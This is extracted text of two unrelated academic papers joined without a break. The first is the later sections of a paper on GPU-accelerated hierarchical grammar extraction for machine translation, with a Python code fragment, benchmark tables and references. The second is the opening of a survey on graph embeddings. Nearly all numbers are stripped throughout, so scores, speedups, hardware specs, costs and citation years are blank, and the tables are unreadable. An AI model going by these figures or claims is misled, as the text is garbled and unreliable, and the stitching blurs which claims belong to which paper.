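    src_count = Counter(src for src, _ in pairs)     # count(alpha)
    feats = {}
    for (src, tgt), c in pair_count.items():
        feats[(src, tgt)] = {
            "log_count_pair": math.log(1 + c),
            "log_count_src":  math.log(1 + src_count[src]),
            "log_prob":       math.log(c / src_count[src]),
            "singleton_pair": float(c == 1),
            "singleton_src":  float(src_count[src] == 1),
        }
    return feats

# tiny example using rules from the running example
rules = [("him", "los"), ("him", "los"), ("it sets ? on", "? excita")]
print(aggregate_features(rules)[("it sets ? on", "? excita")])
```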
however, the lexical weight feature is a function only of the aligned translation pair itself and corresponding word-level translation possibilities calculated externally from word alignment. thus, the computation of this feature can be parallelized on the gpu. so, we have multiple feature extraction passes based on the number of gaps: pass (cpu): one-gap features (new). pass (cpu): two-gap features (new). pass (cpu): contiguous features. pass (gpu): lexical weight feature (new). . sampling in serial implementations of on-demand extraction, very frequent patterns are a major computational bottleneck (callison-burch et al., ; lopez, b). thus, for patterns occurring more than n times, for some fixed n (typically between and ), these implementations deterministically sample n matches, and only extract translations of these matches. to compare with these implementations, we also implement an optional sampling step. though we use the same sampling rate, the samples themselves are not the same, since our extraction checks in passes and alter the set of matches that are actually enumerated, thus sampled from. the cpu algorithms do not use this check. experimental setup we tested our algorithms in an end-to-end chinese- english translation task using data conditions simi- lar to those of lopez ( b) and he et al. ( ). our implementation of hierarchical grammar extrac- tion on the gpu, as detailed in the previous section, is written in c, using cuda library v . and gcc v . , compiled with the -o optimization flag. our code is open source and available for researchers to download and try out. hardware. we used nvidia’s tesla k c gpu (kepler generation), which has cuda cores and gb memory, with a peak memory bandwidth of gb/s. the server hosting the gpu has two intel xeon e - cpus, each with eight cores at . ghz (a total of physical cores; logical cores with hyperthreading). both were released in and represent comparable generation hardware technology. all gpu and cpu experiments were conducted on the same machine, which runs red hat enterprise linux (rhel) . training data. we used two training sets: the first consists of news articles from the xinhua agency, with million words of chinese (around one mil- lion sentences). the second adds parallel text from the united nations, with million words of chi- nese (around four million sentences). test data. for performance evaluations, we ran tests on sentence batches of varying sizes: , , k, k, k, k, k, k and k. these sentences are drawn from the nist – mt evaluations (on average words each) and then the chinese side of the hong kong parallel text (ldc t ) when the nist data are smaller than the target batch http://hohocode.github.io/cgx/ size. large batch sizes are necessary to saturate the processing power of the gpu. the size of the complete batch of k test sentences is kb. baselines. we compared our gpu implementa- tion for on-demand extraction of hierarchical gram- mars against the corresponding cpu implementa- tion (lopez, a) found in pycdec (chahuneau et al., ), an extension of cdec (dyer et al., ). we also compared our gpu algorithms against moses (koehn et al., ), representing a standard phrase-based smt baseline. phrase tables generated by moses are essentially the same as the gpu implementation of on-demand extraction for phrase-based translation by he et al. ( ). results . translation quality we first verified that our gpu implementation achieves the same translation quality as the corresponding cpu baseline. 
this is accomplished by comparing system output against the baseline systems, training on xinhua, tuning on nist , and testing on nist . in all cases, we used mira (chiang, ) to tune parameters. we ran experiments three times and report the average as recommended by clark et al. ( ). hierarchical grammars were extracted with sampling at a rate of ; we also bound source patterns at a length of and matches at a length of . for moses we used default parameters. our bleu scores, shown in table , replicate well-known results where hierarchical models out- perform pure phrase-based models on this task. the difference in quality is partly because the phrase- based baseline system does not use lexicalized re- ordering, which provides similar improvements to hierarchical translation (lopez, b). such lex- icalized reordering models cannot be produced by the gpu-based system of he et al. ( ). this establishes a clear translation quality improvement between our work and that of he et al. ( ). the chahuneau et al. ( ) implementation is in cython, a language for building python applications with performance- critical components in c. all of the pattern matching code that we instrumented for these experiments is compiled to c/c++. the implementation is a port of the original code written by lopez ( a) in pyrex, a precursor to cython. much of the code is unchanged. http://hohocode.github.io/cgx/ system bleu moses phrase-based baseline . hierarchical with online cpu extraction . hierarchical with online gpu extraction . table : comparison of translation quality. the hierarchical system is cdec. online cpu extraction is the baseline, part of the standard cdec package. online gpu extraction is this work. we see that the bleu score obtained by our gpu implementation of hierarchical grammar extraction is nearly identical to cdec’s, evidence that our im- plementation is correct. the minor differences in score are due to non-determinism in tuning and the difference in sampling algorithms (§ . ). . extraction speed next, we focus on the performance of the hierar- chical grammar extraction component, comparing the cpu and gpu implementations. for both implementations, our timings include preparation of queries, pattern matching, extraction, and feature computation. for the gpu implementation, we include the time required to move data to and from the gpu. we do not include time for construction of static data structures (suffix arrays and indexes) and initial loading of the parallel corpus with alignment data, as those represent one-time costs. note that the cpu implementation includes indexes for frequent patterns in the form u ? v and u ? v ? w, while our gpu implementation indexes only the former. we compared performance varying the number of queries, and following lopez ( a), we compared sampling at a rate of against runs without sam- pling. our primary evaluation metric is throughput: the average number of processed words per second (i.e., batch size in words divided by total time). we first establish throughput baselines on the cpu, shown in table . experiments used different numbers of threads under different data conditions (xinhua or xinhua + un), with and without sam- pling. our server has a total of physical cores, but supports logical cores via hyperthreading. we obtained the cpu sampling results by running cdec over k query sentences. for the non-sampling runs, since the throughput is so low, we measured +sampling −sampling threads x x+u x x+u . . . . . . . . . . . . 
table : cpu extraction performance (throughput in words/second) using different numbers of threads under different data conditions (x: xinhua, x+u: xinhua+un), with and without sampling. performance over . k sentences for xinhua and sentences for xinhua + un. we see that throughput scaling is slightly less than linear: with sampling, using threads increases throughput by × on the xinhua data (compared to a single thread) and . × on xinhua + un data. going from to threads further increase throughput by %- % and saturates the processing capacity of our server. the thread condition provides a fair baseline for comparing the performance of the gpu implementation. table shows gpu hierarchical grammar extraction performance in terms of throughput (words/second); these results are averaged over three trials. we varied the number of query sentences, and in each case, also report the speedup with respect to the cpu condition with threads. gpu throughput increases with larger batch sizes because we are increasingly able to saturate the gpu and take full advantage of the massive parallelism it offers. we do not observe this effect on the cpu since we saturate the processors early. with a batch size of sentences, the gpu is slightly slower than the -thread cpu imple- mentation on xinhua and faster on xinhua + un, both with sampling. without sampling, the gpu is already an order of magnitude faster at a batch size of sentences. at a batch size of sentences, the gpu implementation is substantially faster than the -thread cpu version across all conditions. with the largest batch size in our exper- iments of k sentences, the gpu is over an order of magnitude faster than the fully-saturated cpu with sampling, and over two orders of magnitude faster without sampling. although previous work does not show decreased translation quality due batch size number of sentences k k k k k k k number of tokens . k . k . k . k . k . k . k . k . k + s am pl in g xinhua throughput (words/s) speedup . × . × . × . × . × . × . × . × . × xinhua+un throughput (words/s) speedup . × . × . × . × . × . × . × . × . × − s am pl in g xinhua throughput (words/s) speedup × × × × × × × × × xinhua+un throughput (words/s) speedup × × × × × × × × × table : gpu grammar extraction throughput (words/second) under different batch sizes, data conditions, with and without sampling. speedup is computed with respect to the cpu baseline running on threads. +sampling −sampling x x+u x x+u gpu one-by-one . . . . cpu single-thread . . . . table : sentence-by-sentence gpu grammar extraction throughput (words/second) vs. a single thread on the cpu (x: xinhua, x+u: xinhua + un). to sampling (callison-burch et al., ; lopez, b), these results illustrate the raw computa- tional potential of gpus, showing that we can elim- inate heuristics that make cpu processing tractable. we believe future work can exploit these untapped processing cycles to improve translation quality. how does the gpu fare for translation tasks that demand low latency, such as sentence-by-sentence translation on the web? to find out, we conducted experiments where the sentences are fed, one by one, to the gpu grammar extraction algorithm. results are shown in table , with a comparison to a single- threaded cpu baseline. to be consistent with the other results, we also measure speed in terms of throughput here. note that we are not aware of any freely available multi-threaded cpu algorithm to process an individual sentence in parallel, so the single-thread cpu comparison is reasonable. 
we observe that the gpu is slower only with sam- pling on the smaller xinhua data. in all other parallel sub-sentential parsing has been known for many years (chandwani et al., ) although we don’t know of an implementation in any major open-source mt systems. queries k k k k gpu pbmt s s s s gpu hiero s s s s slowdown . × . × . × . × table : grammar extraction time comparing this work (gpu hiero) and the work of he et al. ( ) (gpu pbmt). cases, sentence-by-sentence processing on the gpu achieves a similar level of performance or is faster. next, we compare the performance of hierarchical grammar extraction to phrase-based extraction on the gpu with sampling. we replicated the test data condition of he et al. ( ) so that our first k query sentences are the same as those used in their exper- iments. the results are shown in table , where we report grammar extraction time for batches of different sizes; the bottom row shows the slowdown of the hierarchical vs. non-hierarchical grammar conditions. this quantifies the performance penalty to achieve the translation quality gains reported in table . hierarchical grammar extraction is about three times slower, primarily due to the computa- tional costs of the new passes presented in § . another aspect of performance is memory foot- print. we report the memory use (cpu ram) of all four conditions in table . the values reported for the cpu implementation use a single thread only. at runtime, our hierarchical gpu system exhibits peak cpu memory use of gb on the host machine. most of this memory is consumed by batching ex- cpu gpu pbmt . gb . gb hiero . gb . gb table : memory consumption (cpu ram) for different experimental conditions. tracted phrases before scoring in passes through . since the phrase-based gpu implementation processes far fewer phrases, the memory footprint is much smaller. the cpu implementations pro- cess extracted phrases in small batches grouped by source phrase, and thus exhibit less memory usage. however, these levels of memory consumption are modest considering modern hardware. in all other respects, memory usage is similar for all systems, since the suffix array and associated data structures are all linear in the size of the indexed parallel text. . per-pass speed to obtain a detailed picture of where the gpu speedups and bottlenecks are, we collected per-pass timing statistics. table shows results for grammar extraction on k queries using the xinhua data with no sampling and default length constraints (passes in gray occur on the gpu; all others on the cpu). these numbers explain the decreased speed of hi- erarchical extraction compared to he et al. ( ), with the new passes (shown in italics) accounting for more than % of the total computation time. however, even passes that are nominally the same actually require more time in the hierarchical case: in extracting and scoring phrases associated with a contiguous pattern u, we must now also extract and score patterns ? u, u ?, and ? u ?. interestingly, the cpu portions of our algorithm account for around half of the total grammar ex- traction time. one way to interpret this observation is that the massive parallelization provided by the gpu is so effective that we are bottlenecked by the cpu. in our current design, the cpu portions are those that cannot be easily parallelized on the gpu or those that require too much memory to fit on the gpu. 
the former is a possible target for optimization in future work, though the latter will likely be solved by hardware advances alone: for example, the tesla k has gb of memory. pass time % contig. pattern pass . . % contig. pattern pass . . % one-gap pattern generation . . % one-gap pattern matching . . % two-gap pattern generation . . % two-gap pattern matching . . % gappy pattern processing . . % contig. pattern extraction . . % two-gap pattern extraction . . % one-gap pattern extraction . . % one gap translation features . . % two gap translation features . . % contig. translation features . . % lexical weight feature . . % data transfer and control . . % total . . % table : detailed timings (in seconds) for k queries. passes in gray occur on the gpu; all others on the cpu. passes needed for hierarchical grammars are in italics, which are not present in he et al. ( ). . end-to-end speed what is the benefit of using gpus in an end-to- end translation task? since we have shown that both the cpu and gpu implementations achieve near-identical translation quality, the difference lies in speed. but speed is difficult to measure fairly: translation involves not only grammar extraction but also decoding and associated i/o. we have focused on grammar extraction on the gpu, but our research vision involves eventually moving all components of the machine translation pipeline onto the gpu. the experiments we describe below capture the performance advantages of our implementation that are achievable today, using cdec for decoding (on the cpu, using threads). to measure end-to-end translation speed using pycdec, per-sentence grammars are first extracted for a batch of sentences and written to disk, then read from disk during decoding. therefore, we report times separately for grammar extraction, disk i/o, and decoding (which includes time for reading the grammar files from disk back into memory). grammar extraction is either performed on the gpu grammar extraction disk i/o decoding gpu: . s . s cpu: s cpu: . s table : running times for an end-to-end translation pipeline over nist test data. grammar extraction is either performed on the gpu or the cpu ( threads); other stages are the same for both conditions (decoding uses threads). or on the cpu (using threads), same as the experiments described in the previous section. results are shown in table using the xinhua training data and nist test data ( sentences, , words). all experiment settings are ex- actly the same as in the previous section. we observe an end-to-end translation throughput of words/second with gpu grammar extraction and words/second on the cpu ( threads), for a speedup of . ×. despite the speedup, we note that this experiment favors the cpu for several reasons. first, the gpu is idle during decoding, but it could be used to process grammars for a subsequent batch of sentences in a pipelined fashion. second, nist is a small batch that doesn’t fully saturate the gpu—throughput keeps increasing by a large margin with larger batch sizes (see results in table ). third, in comparison to the -thread cpu baseline, our gpu extraction only uses a single thread on the cpu throughout its execution, thus the cpu portion of the performance can be further improved, especially in the feature generation passes (see § . for details). of course, the gpu/cpu combination requires a server equipped with a gpu, incurring additional hardware costs. we estimate that in q dollars, our base system would cost roughly $ usd, and the gpu would cost another $ usd. 
however, the server-grade gpu used in this work is not the only choice: a typical high-end consumer gpu, such as the nvidia gtx titan black (around $ ), costs considerably less but has even higher memory bandwidth and with similarly impressive floating point performance. this price difference is due to extra functionalities (e.g., error-correcting code memory) for specific applications (e.g., sci- entific computing), and is not directly related to differences in raw computational power. this means that we could speed up overall translation by % if we spend an additional % (server-grade gpu) or % (consumer-grade gpu) on hardware. from an economic perspective, this is an attractive proposi- tion. of course, the advantages of using gpus for high-throughput translation go up further with larger batch sizes. . one-time construction costs construction of static data structures for on-demand grammar extraction is a one-time cost given a corpus t . however, under a streaming scenario where we might receive incremental changes to t as new training data become available, we need to update the data structures appropriately. updating static data structures involves two costs: the suffix array with its lcp array and the precom- putation indexes. we do not consider the alignment construction cost as it is external to cdec (and is a necessary step for all implementations). for the xinhua data, building the suffix array using a single cpu thread takes . seconds and building the precomputation indexes on the gpu takes . seconds. compared to table , these one-time costs represent approximately % of the gpu grammar extraction time. it is possible to lower the construction costs of these data structures given recent advances. lev- enberg et al. ( ) describe novel algorithms that allow efficient in-place updates of the suffix array when new training data arrive. that work directly tackles on-demand smt architectures in the stream- ing data scenario. alternatively, the speed of suffix array construction can be improved significantly by the cuda data parallel primitives library, which provides fast sorting algorithms to efficiently construct suffix arrays on the gpu. minimizing data preparation costs has not been a focus of this work, but we believe that the massive parallelism provided by the gpu represents promising future work. conclusions and future work the increasing demands for translation services be- cause of globalization (pangeanic, ; sykes, ) make high-throughput translation a realistic http://cudpp.github.io/cudpp/ . / http://cudpp.github.io/cudpp/ . / scenario, and one that our gpu implementation is highly suited to serve. high-throughput translation also enables downstream applications such as doc- ument translation in cross-language information re- trieval (oard and hackett, ), where we translate the entire source document collection into the target language prior to indexing. the number of transistors on a chip continues to increase exponentially, a trend that even pessimists concede should continue at least until the end of the decade (vardi, ). computer architects widely agree that instruction-level hardware parallelism is long past the point of diminishing returns (olukotun and hammond, ). this has led to a trend of placing greater numbers of cores on the same die. the question is how to best utilize the transistor budget: a small number of complex cores, a large number of simple cores, or a mixture of both? 
for our problem, it appears that we can take advantage of brute force scans and fine-grained parallelism inherent in the problem of on-demand extraction, which makes investments in large numbers of simple cores (as on the gpu) a win. this observation is in line with trends in other ar- eas of computing. many problems in computational biology, like computational linguistics, boil down to efficient search on discrete sequences of symbols. dna sequence alignment systems mummergpu (schatz et al., ) and mummergpu (trap- nell and schatz, ) use suffix trees to perform dna sequence matching on the gpu, while the state-of-the-art system mummurgpu++ (gharaibeh and ripeanu, ) uses suffix arrays, as we do here. our algorithms for matching gappy patterns in passes and are closely related to seed-and-extend algorithms for approximate matching in dna se- quences, which have recently been implemented on gpus (wilton et al., ). it is unlikely that cpu processing will become obsolete, since not all problems can be cast in a data- parallel framework. ultimately, we need a hybrid architecture where parallelizable tasks are offloaded to the gpu, which works in conjunction with the cpu to handle irregular computations in a pipelined fashion. in a well-balanced system, both the gpu and the cpu would be fully utilized, performing the types of computation they excel at, unlike in our current design, where the gpu sits idle while the cpu finishes decoding. a part of our broad research agenda is exploring which aspects of the machine translation pipeline are amenable to gpu algorithms. the performance analysis in § . shows that even in grammar extraction there are cpu bottlenecks we need to address and opportunities for further optimization. beyond grammar extraction, there is a question about whether decoding can be moved to the gpu. memory is a big hurdle: since accessing data struc- tures off-gpu is costly, it would be preferable to hold all models in gpu memory. we’ve addressed the problem for translation models, but the language models used in machine translation are also large. it might be possible to use lossy compression (tal- bot and osborne, ) or batch request strategies (brants et al., ) to solve this problem. if we do, we believe that translation models could be decoded using variants of gpu algorithms for speech (chong et al., ) or parsing (yi et al., ; canny et al., ; hall et al., ), though the latter algorithms exploit properties of latent-variable grammars that may not extend to translation. thinking beyond decoding, we believe that other problems in compu- tational linguistics might benefit from the massive parallelism offered by gpus. acknowledgments this research was supported in part by the bolt program of the defense advanced research projects agency, contract no. hr - -c- ; nsf under award iis- ; and the human language technology center of excellence at johns hopkins university. any opinions, findings, conclusions, or recommendations expressed in this paper are those of the authors and do not necessarily reflect views of the sponsors. the second author is grateful to esther and kiri for their loving support and dedicates this work to joshua and jacob. we thank nikolay bogoychev and the anonymous tacl re- viewers for helpful comments on previous drafts, rich cox for support and advice, and clip labmates (particularly junhui li and wu ke) for helpful discussions. 
we also thank umiacs for providing hardware resources via the nvidia cuda center of excellence, and the umiacs it staff, especially joe webster, for excellent support. references paul baltescu and phil blunsom. . a fast and simple online synchronous context free grammar extractor. the prague bulletin of mathematical linguistics, ( ): – . thorsten brants, ashok c. popat, peng xu, franz j. och, and jeffrey dean. . large language models in machine translation. in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning (emnlp-conll ), pages – . chris callison-burch, colin bannard, and josh schroeder. . scaling phrase-based statistical machine translation to larger corpora and longer phrases. in proceedings of the rd annual meeting on association for computational linguistics (acl ), pages – . john canny, david hall, and dan klein. . a multi-teraflop constituency parser using gpus. in proceedings of the conference on empirical methods in natural language processin (emnlp ), pages – . victor chahuneau, noah a. smith, and chris dyer. . pycdec: a python interface to cdec. in proceedings of the th machine translation marathon (mtm ). m. chandwani, m. puranik, and n. s. chaudhari. . on cky-parsing of context-free grammars in parallel. in proceedings of technology enabling tomorrow: computers, communications and automation towards the st century, pages – . david chiang. . hierarchical phrase-based translation. computational linguistics, ( ): – . david chiang. . hope and fear for discriminative training of statistical translation models. journal of machine learning research, : – . jike chong, ekaterina gonina, youngmin yi, and kurt keutzer. . a fully data parallel wfst-based large vocabulary continuous speech recognition on a graphics processing unit. in proceedings of the th annual conference of the international speech communication association (interspeech ), pages – . jonathan h. clark, chris dyer, alon lavie, and noah a. smith. . better hypothesis testing for statistical machine translation: controlling for optimizer instability. in proceedings of the th annual meeting of the association for computational linguistics (acl ), pages – . chris dyer, adam lopez, juri ganitkevitch, johnathan weese, ferhan ture, phil blunsom, hendra setiawan, vladimir eidelman, and philip resnik. . cdec: a decoder, alignment, and learning framework for finite-state and context-free translation models. in proceedings of the acl system demonstrations, pages – . michel galley and christopher d. manning. . accurate non-hierarchical phrase-based translation. in human language technologies: the annual conference of the north american chapter of the as- sociation for computational linguistics (hlt/naacl ), pages – . abdullah gharaibeh and matei ripeanu. . size matters: space/time tradeoffs to improve gpgpu applications performance. in proceedings of the acm/ieee international conference for high performance computing, networking, storage and analysis (sc ), pages – . jesús gonzález-rubio, daniel ortiz-martı́nez, and francisco casacuberta. . active learning for interactive machine translation. in proceedings of the th conference of the european chapter of the association for computational linguistics (eacl ), pages – . david hall, taylor berg-kirkpatrick, and dan klein. . sparser, better, faster gpu parsing. in proceed- ings of the nd annual meeting of the association for computational linguistics (acl ), pages – . hua he, jimmy lin, and adam lopez. . 
massively parallel suffix array queries and on-demand phrase extraction for statistical machine translation using gpus. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – . jared hoberock and nathan bell. . thrust: a parallel template library. version . . . philipp koehn, hieu hoang, alexandra birch, chris callison-burch, marcello federico, nicola bertoldi, brooke cowan, wade shen, christine moran, richard zens, chris dyer, ondřej bojar, alexandra con- stantin, and evan herbst. . moses: open source toolkit for statistical machine translation. in proceedings of the th annual meeting of the acl on interactive poster and demonstration sessions, pages – . abby levenberg, chris callison-burch, and miles osborne. . stream-based translation models for statistical machine translation. in human language technologies: the annual conference of the north american chapter of the association for computational linguistics (hlt/naacl ), pages – . adam lopez. . hierarchical phrase-based translation with suffix arrays. in proceedings of the joint conference on empirical methods in natural language processing and computational natural language learning (emnlp-conll ), pages – . adam lopez. a. machine translation by pattern matching. ph.d. dissertation, university of maryland, college park, maryland, usa. adam lopez. b. tera-scale translation models via pattern matching. in proceedings of the nd in- ternational conference on computational linguistics (coling ), pages – . udi manber and gene myers. . suffix arrays: a new method for on-line string searches. in proceedings of the first annual acm-siam symposium on discrete algorithms (soda ’ ), pages – . douglas w. oard and paul hackett. . document translation for cross-language text retrieval at the university of maryland. in proceedings of the th text retrieval conference (trec- ). franz josef och, christoph tillmann, and hermann ney. . improved alignment models for statistical machine translation. in proceedings of the joint sigdat conference on empirical methods in natural language processing and very large corpora (emnlp ), pages – . kunle olukotun and lance hammond. . the future of microprocessors. acm queue, ( ): – . pangeanic, . what is the size of the translation industry? http://www.pangeanic.com/knowledge center/size-translation-industry/. aaron b. philips. . modeling relevance in statistical machine translation: scoring alignment, context, and annotations of translation instances. ph.d. thesis, carnegie mellon university. michael schatz, cole trapnell, arthur delcher, and amitabh varshney. . high-throughput sequence alignment using graphics processing units. bmc bioinformatics, ( ): . michel simard, nicola cancedda, bruno cavestro, marc dymetman, eric gaussier, cyril goutte, and kenji yamada. . translating with non-contiguous phrases. in proceedings of human language technology conference and conference on empirical methods in natural language processing (emnlp ), pages – . patrick simianer, stefan riezler, and chris dyer. . joint feature selection in distributed stochastic learning for large-scale discriminative training in smt. in proceedings of the th annual meeting of the association for computational linguistics (acl ), pages – . tanisha sykes, . growth in translation. http://www.inc.com/articles/ / /translation.html. david talbot and miles osborne. . randomised language modelling for statistical machine translation. 
in proceedings of the th annual meeting of the association for computational linguistics (acl ), pages – . cole trapnell and michael c. schatz. . optimizing data intensive gpgpu computations for dna se- quence alignment. parallel computing, ( - ): – . moshe y. vardi. . moore’s law and the sand-heap paradox. communications of the acm, ( ): . richard wilton, tamas budavari, ben langmead, sarah wheelan, steven l. salzberg, and alex szalay. . faster sequence alignment through gpu- accelerated restriction of the seed-and-extend search space. http://dx.doi.org/ . / . youngmin yi, chao-yue lai, slav petrov, and kurt keutzer. . efficient parallel cky parsing on gpus. in proceedings of the th international conference on parsing technologies, pages – . ying zhang and stephan vogel. . an efficient phrase-to-phrase alignment model for arbitrarily long phrase and large corpora. in proceedings of the tenth conference of the european association for machine translation (eamt- ). http://www.pangeanic.com/knowledge_center/size-translation-industry/ http://www.pangeanic.com/knowledge_center/size-translation-industry/ survey on graph embeddings and their applications to machine learning problems on graphs survey on graph embeddings and their applications to machine learning problems on graphs ilya makarov , , dmitrii kiselev , nikita nikitinsky and lovro subelj hse university, moscow, russia faculty of computer and information science, university of ljubljana, ljubljana, slovenia big data research center, national university of science and technology misis, moscow, russia abstract dealing with relational data always required significant computational resources, domain expertise and task-dependent feature engineering to incorporate structural information into a predictive model. nowadays, a family of automated graph feature engineering techniques has been proposed in different streams of literature. so-called graph embeddings provide a powerful tool to construct vectorized feature spaces for graphs and their components, such as nodes, edges and subgraphs under preserving inner graph properties. using the constructed feature spaces, many machine learning problems on graphs can be solved via standard frameworks suitable for vectorized feature representation. our survey aims to describe the core concepts of graph embeddings and provide several taxonomies for their description. first, we start with the methodological approach and extract three types of graph embedding models based on matrix factorization, random-walks and deep learning approaches. next, we describe how different types of networks impact the ability of models to incorporate structural and attributed data into a unified embedding. going further, we perform a thorough evaluation of graph embedding applications to machine learning problems on graphs, among which are node classification, link prediction, clustering, visualization, compression, and a family of the whole graph embedding algorithms suitable for graph classification, similarity and alignment problems. finally, we overview the existing applications of graph embeddings to computer science domains, formulate open problems and provide experiment results, explaining how different networks properties result in graph embeddings quality in the four classic machine learning problems on graphs, such as node classification, link prediction, clustering and graph visualization. 
as a result, our survey covers a new rapidly growing field of network feature engineering, presents an in-depth analysis of models based on network types, and overviews a wide range of applications to machine learning problems on graphs. subjects artificial intelligence, data mining and machine learning, network science and online social networks, theory and formal methods, world wide web and web science keywords graph embedding, knowledge representation, machine learning, network science, geometric deep learning, graph neural networks, node classification, link prediction, node clustering, graph visualization how to cite this article makarov i, kiselev d, nikitinsky n, subelj l. . survey on graph embeddings and their applications to machine learning problems on graphs. peerj comput. sci. :e doi . /peerj-cs. submitted july accepted december published february corresponding authors ilya makarov, iamakarov@hse.ru dmitrii kiselev, dkiseljov@hse.ru academic editor xiangjie kong additional information and declarations can be found on page doi . /peerj-cs. copyright makarov et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:iamakarov@�hse.�ru mailto:dkiseljov@�hse.�ru https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ introduction many instances in the real world can be modeled as graphs or networks. some of the typical examples include social interactions, biological data, such as protein interactions or neural connections, links between websites on the internet, etc. one of the main goals of graph modeling is to formulate a general technique capable of processing structural data including relations between objects, which may also have some domain-specific information. for example, given a social network, we might be interested in predicting whether a pair of users are friends, or in identifying communities of interconnected users. the former leads to a link prediction problem on the graph, while the latter describes a node clustering problem. we focus on graph representation theory, aiming to automatically learn low- dimensional vector features for the simplest graph motifs, such as nodes and edges, in a way that would enable efficiently solve machine learning problems on graphs including node classification, link prediction, node clustering, while also tackling approaches for graph similarity and classification, and general aspects of graph visualization. before the emergence of the area, the extraction of important features for predictive tasks on graphs had to be manually engineered. it required a lot of efforts from the domain experts. for example, many approaches for graph representation rely on extracting summary statistics, such as vertex degrees or clustering coefficients (bhagat, cormode & muthukrishnan, ) popular in social sciences, graph kernels (vishwanathan et al., ) particularly used in computational biology to compute inner product similarities between graphs, or specifically designed features to measure neighborhood similarity (liben-nowell & kleinberg, ). in addition to the time-consuming feature engineering, such summaries were very inflexible, task/data-dependent, and did not generalize well across different prediction tasks on graphs. an alternative methodology is to learn feature representations automatically as an optimization problem. 
the goal is to design objective cost functions that capture dependencies and similarities in a graph while preserving high quality in relational machine learning tasks and constructing graph embeddings under efficiency constraints over time and memory. today, there exists a large variety of graph embeddings automatically extract vector representation for networks (moyano, ; hamilton, ying & leskovec, b; cai, zheng & chang, ; cui et al., ; goyal & ferrara, ; chen et al., a; wu et al., b), knowledge graphs (nickel et al., ) and biological data (su et al., ). some of these algorithms only work with structural information, such as popular node vec (grover & leskovec, ), line (tang et al., ), deepwalk (perozzi, al-rfou & skiena, ), while others like gcn (kipf & welling, a), graphsage (hamilton, ying & leskovec, a), vgae (kipf & welling, b) also use node attributes. the methods also differ based on whether a given graph is (un)directed, (un)weighted, (non-)attributed, (dis)assortative, if it changes over time in terms of adding/deleting nodes/edges, and whether they use a transductive or inductive approach for learning network dynamics inference. all of these models have their advantages and shortcomings, but what unifies them is the unique pipeline to verify the network embedding model in terms of the quality makarov et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of machine learning tasks on benchmark datasets. in addition, authors measure construction and inference time efficiency, memory consumption, and a possibility to include graph dynamics in the model. most surveys on graph embeddings provide a simple taxonomy for graph models based on how the model is fitted and only show applications within the graph domain, for example, node classification or link prediction (moyano, ; hamilton, ying & leskovec, b). goyal & ferrara ( ) provide experiments and study the influence of hyperparameters on different tasks. some works focus on a specific field such as attention models (lee et al., ) and graph neural networks (wu et al., b; chen et al., a; zhang, cui & zhu, ). cui et al. ( ) compare models in terms of what information they preserve: structure and properties or side information. neural network approaches are usually classified by the core architecture, for example, recurrent neural networks (rnn) or convolutional neural networks (cnn), and losses for different tasks, such as cross-entropy for link prediction and node classification and reconstruction loss for unsupervised representation learning. chen et al. ( a) provides meta-strategies for choosing embedding models, but examine only deep learning based methods. lee et al. ( ) follow the classification of cai, zheng & chang ( ) and separate attention models by type of input and output, deriving recommendations for working with different graphs (heterogeneity, multi-view, directed acyclic graphs) and on different tasks (node classification, clustering, ranking, alignment, link prediction). zhang, cui & zhu ( ) is quite similar to other gnn surveys, but also provides an overview of modern models and tasks like reinforcement learning on graphs, analyses techniques for better representation learning like sampling strategies, skip connections, inductive learning and adversarial training. in contrast, our work tries to generalize the advances of previous surveys. 
our survey is not limited to specific model types and provides an overview from different angles: training process, input graph properties, specific tasks and applications in a non-graph domain, open problems, etc. the paper is structured as follows. we start with a brief explanation of general approaches to learn network embeddings and introduce the reader to the core ideas of graph representation models. next, we describe different models adapted to specific types of networks. then, we state the most crucial machine learning problems on graphs and solutions to them based on network embeddings. to cover the use of the overviewed models, we provide applications to other machine learning domains. we finalize the review sections with a listing of open problems in the field of network representation learning. finally, we provide our experiments to understand in practice how different graph embeddings perform on benchmark network datasets, and to interpret why a chosen graph embedding model with a given training setting results in good or bad quality on a given benchmark dataset and how this is related to the method behind the model. our experiment section aims to show how one can choose the best graph embedding from the nature of the model construction and network descriptive statistics, which is one of the most interesting problems for practical applications of graph embeddings in machine learning frameworks.

preliminaries
before describing any methods we need to introduce some definitions. we will use v as the set of graph vertices, e as the set of graph edges, a as the graph adjacency matrix and g(v, e) as the graph description. the procedure of constructing a vector representation of a graph is called graph embedding.
definition (graph embedding) is a mapping from a collection of substructures (most commonly either all nodes, all edges, or certain subgraphs) to r^d. we will mostly consider node embeddings: f : v → r^d, with d ≪ |v|.
for many graph-based tasks, the most natural task formulation is unsupervised learning: this is the case when we need to learn embeddings using only the adjacency matrix a containing information on structural similarity and possibly attributed features x, but without a task-specific loss part. it is also possible that there are labels available for some substructures of the graph, and we wish to recover missing labels in a semi-supervised approach. one example of this is node classification, in which all nodes are available from the outset, but only a fraction is labeled. now let us clarify what is meant by a good embedding. by the embedding procedure, one should aim to compress the data, while retaining most of the essential information about similarities and simultaneously extracting important features from the structural information. what counts as essential may vary depending on the intended application; the most common properties we want to capture in a graph are termed node proximity and structural similarity (neighbourhood information and structural role, respectively).
definition (first and second order proximities) the first-order proximity describes the pairwise proximity between vertices. for any two vertices, the weight aij (possibly zero) of the edge between vi and vj characterizes the first-order proximity between these vertices, thus representing the adjacency matrix a = (aij) for i, j = 1, ..., n.
